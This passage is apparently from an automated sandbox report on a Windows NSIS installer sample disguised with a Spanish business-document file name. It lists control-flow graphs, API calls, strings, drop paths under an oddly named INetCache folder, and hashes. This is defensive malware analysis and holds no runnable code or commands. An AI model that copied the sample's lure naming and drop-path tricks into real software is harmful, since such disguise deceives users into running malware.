                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable), ref: 00403BC3
                                                  • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-506798098
                                                • Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                • Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 361 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 364 402f25-402f2a 361->364 365 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 361->365 366 403174-403178 364->366 373 402f63-402f7a 365->373 374 40304d-40305b call 402e33 365->374 376 402f7c 373->376 377 402f7e-402f8b call 4033ec 373->377 380 403061-403064 374->380 381 40312c-403131 374->381 376->377 383 402f91-402f97 377->383 384 4030e8-4030f0 call 402e33 377->384 385 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 380->385 386 403066-40307e call 403402 call 4033ec 380->386 381->366 387 403017-40301b 383->387 388 402f99-402fb1 call 405da2 383->388 384->381 411 4030f2-403122 call 403402 call 40317b 385->411 412 4030de-4030e3 385->412 386->381 413 403084-40308a 386->413 396 403024-40302a 387->396 397 40301d-403023 call 402e33 387->397 388->396 406 402fb3-402fba 388->406 398 40302c-40303a call 40669d 396->398 399 40303d-403047 396->399 397->396 398->399 399->373 399->374 406->396 410 402fbc-402fc3 406->410 410->396 414 402fc5-402fcc 410->414 421 403127-40312a 411->421 412->366 413->381 413->385 414->396 416 402fce-402fd5 414->416 416->396 418 402fd7-402ff7 416->418 418->381 420 402ffd-403001 418->420 422 403003-403007 420->422 423 403009-403011 420->423 421->381 424 403133-403144 421->424 422->374 422->423 423->396 427 403013-403015 423->427 425 403146 424->425 426 40314c-403151 424->426 425->426 428 403152-403158 426->428 427->396 428->428 429 40315a-403172 call 405da2 428->429 429->366
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EE9
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,00000400), ref: 00402F05
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00402F4E
                                                • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                Strings
                                                • C:\Users\user\Desktop, xrefs: 00402F30, 00402F35, 00402F3B
                                                • xc, xrefs: 0040311D
                                                • soft, xrefs: 00402FC5
                                                • "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe", xrefs: 00402ED5
                                                • Error launching installer, xrefs: 00402F25
                                                • Null, xrefs: 00402FCE
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
                                                • Inst, xrefs: 00402FBC
                                                • C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, xrefs: 00402EEF, 00402EFE, 00402F12, 00402F2F
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$xc
                                                • API String ID: 2803837635-789679933
                                                • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 432 406234-40623f 433 406241-406250 432->433 434 406252-406268 432->434 433->434 435 406480-406486 434->435 436 40626e-40627b 434->436 437 40648c-406497 435->437 438 40628d-40629a 435->438 436->435 439 406281-406288 436->439 440 4064a2-4064a3 437->440 441 406499-40649d call 406212 437->441 438->437 442 4062a0-4062ac 438->442 439->435 441->440 443 4062b2-4062ee 442->443 444 40646d 442->444 446 4062f4-4062ff GetVersion 443->446 447 40640e-406412 443->447 448 40647b-40647e 444->448 449 40646f-406479 444->449 450 406301-406305 446->450 451 406319 446->451 452 406414-406418 447->452 453 406447-40644b 447->453 448->435 449->435 450->451 454 406307-40630b 450->454 457 406320-406327 451->457 455 406428-406435 call 406212 452->455 456 40641a-406426 call 406159 452->456 458 40645a-40646b lstrlenW 453->458 459 40644d-406455 call 406234 453->459 454->451 460 40630d-406311 454->460 470 40643a-406443 455->470 456->470 462 406329-40632b 457->462 463 40632c-40632e 457->463 458->435 459->458 460->451 466 406313-406317 460->466 462->463 468 406330-40634d call 4060df 463->468 469 40636a-40636d 463->469 466->457 478 406352-406356 468->478 471 40637d-406380 469->471 472 40636f-40637b GetSystemDirectoryW 469->472 470->458 474 406445 470->474 476 406382-406390 GetWindowsDirectoryW 471->476 477 4063eb-4063ed 471->477 475 4063ef-4063f3 472->475 479 406406-40640c call 4064a6 474->479 475->479 482 4063f5-4063f9 475->482 476->477 477->475 481 406392-40639c 477->481 478->482 483 40635c-406365 call 406234 478->483 479->458 485 4063b6-4063cc SHGetSpecialFolderLocation 481->485 486 40639e-4063a1 481->486 482->479 488 4063fb-406401 lstrcatW 482->488 483->475 490 4063e7 485->490 491 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 485->491 486->485 489 4063a3-4063aa 486->489 488->479 493 4063b2-4063b4 489->493 490->477 491->475 491->490 493->475 493->485
                                                APIs
                                                • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004062F7
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
                                                • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 0040645B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-2578779655
                                                • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 558 40176f-401794 call 402c53 call 405c3d 563 401796-40179c call 406212 558->563 564 40179e-4017b0 call 406212 call 405bc6 lstrcatW 558->564 569 4017b5-4017b6 call 4064a6 563->569 564->569 573 4017bb-4017bf 569->573 574 4017c1-4017cb call 406555 573->574 575 4017f2-4017f5 573->575 583 4017dd-4017ef 574->583 584 4017cd-4017db CompareFileTime 574->584 577 4017f7-4017f8 call 405dc2 575->577 578 4017fd-401819 call 405de7 575->578 577->578 585 40181b-40181e 578->585 586 40188d-4018b6 call 405371 call 40317b 578->586 583->575 584->583 587 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 585->587 588 40186f-401879 call 405371 585->588 600 4018b8-4018bc 586->600 601 4018be-4018ca SetFileTime 586->601 587->573 621 401864-401865 587->621 598 401882-401888 588->598 602 402ae4 598->602 600->601 604 4018d0-4018db CloseHandle 600->604 601->604 605 402ae6-402aea 602->605 607 4018e1-4018e4 604->607 608 402adb-402ade 604->608 609 4018e6-4018f7 call 406234 lstrcatW 607->609 610 4018f9-4018fc call 406234 607->610 608->602 616 401901-4022fc call 405957 609->616 610->616 616->605 621->598 622 401867-401868 621->622 622->588
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable$C:\Users\user\AppData\Local\Temp\nsz2C67.tmp$C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll$Call
                                                • API String ID: 1941528284-2928837671
                                                • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 624 405371-405386 625 40538c-40539d 624->625 626 40543d-405441 624->626 627 4053a8-4053b4 lstrlenW 625->627 628 40539f-4053a3 call 406234 625->628 630 4053d1-4053d5 627->630 631 4053b6-4053c6 lstrlenW 627->631 628->627 633 4053e4-4053e8 630->633 634 4053d7-4053de SetWindowTextW 630->634 631->626 632 4053c8-4053cc lstrcatW 631->632 632->630 635 4053ea-40542c SendMessageW * 3 633->635 636 40542e-405430 633->636 634->633 635->636 636->626 637 405432-405435 636->637 637->626
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                • lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004053CC
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll), ref: 004053DE
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll
                                                • API String ID: 2531174081-760252623
                                                • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 638 402660-402679 call 402c31 641 402adb-402ade 638->641 642 40267f-402686 638->642 643 402ae4-402aea 641->643 644 402688 642->644 645 40268b-40268e 642->645 644->645 647 4027f2-4027fa 645->647 648 402694-4026a3 call 406172 645->648 647->641 648->647 651 4026a9 648->651 652 4026af-4026b3 651->652 653 402748-40274b 652->653 654 4026b9-4026d4 ReadFile 652->654 656 402763-402773 call 405e6a 653->656 657 40274d-402750 653->657 654->647 655 4026da-4026df 654->655 655->647 660 4026e5-4026f3 655->660 656->647 666 402775 656->666 657->656 658 402752-40275d call 405ec8 657->658 658->647 658->656 663 4026f9-40270b MultiByteToWideChar 660->663 664 4027ae-4027ba call 406159 660->664 663->666 667 40270d-402710 663->667 664->643 669 402778-40277b 666->669 670 402712-40271d 667->670 669->664 672 40277d-402782 669->672 670->669 673 40271f-402744 SetFilePointer MultiByteToWideChar 670->673 674 402784-402789 672->674 675 4027bf-4027c3 672->675 673->670 676 402746 673->676 674->675 679 40278b-40279e 674->679 677 4027e0-4027ec SetFilePointer 675->677 678 4027c5-4027c9 675->678 676->666 677->647 680 4027d1-4027de 678->680 681 4027cb-4027cf 678->681 679->647 682 4027a0-4027a6 679->682 680->647 681->677 681->680 682->652 683 4027ac 682->683 683->647
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402707
                                                • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402740
                                                  • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EDE
                                                • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59

                                                Control-flow Graph

                                                APIs
                                                • GetDC.USER32(?), ref: 00401DB6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
